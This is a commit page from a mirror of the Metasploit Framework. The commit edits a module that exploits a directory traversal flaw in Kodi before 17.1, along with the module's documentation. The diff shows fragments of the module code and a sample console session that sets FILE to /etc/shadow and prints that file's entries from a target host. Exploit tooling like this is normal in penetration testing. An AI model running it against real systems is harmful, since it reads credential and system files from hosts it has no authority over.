infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Take into account @h00die's comments.

bug/bundler_fix
jvoisin 2017-02-20 13:22:20 +01:00
parent 7bd6aff1cf
commit 73eed104a9
2 changed files with 11 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
documentation/modules/auxiliary/scanner/http/kodi_traversal.md
View File

@ -1,17 +1,18 @@
## Vulnerable Application
This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1.
**Vulnerable Application Installation Steps**
Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz),
or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
You'll need a version lower than 17.1.
You'll need a version lower than 17.1 of Kodi.
## Verification Steps
A successful check of the exploit will look like this:
A successful run of the exploit will look like this:
```
msf > use auxiliary/scanner/http/kodi_traversal
@ -19,6 +20,8 @@ msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > set FILE /etc/shadow
FILE => /etc/shadow
msf auxiliary(kodi_traversal) > run
[*] Reading '/etc/shadow'
@ -35,6 +38,4 @@ dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf auxiliary(kodi_traversal) > info
```

8
modules/auxiliary/scanner/http/kodi_traversal.rb
View File

@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Kodi 17.1 Local File Inclusion Vulnerability',
'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',
'Description' => %q{
This module exploits a directory traversal flaw found in Kodi 17.1.
This module exploits a directory traversal flaw found in Kodi before 17.1.
},
'References' =>
[
@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
], self.class)
end
@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{fname} stored as '#{p}'")
else
print_error("Fail to obtain file for some unknown reason")
print_error('Fail to obtain file for some unknown reason')
end
end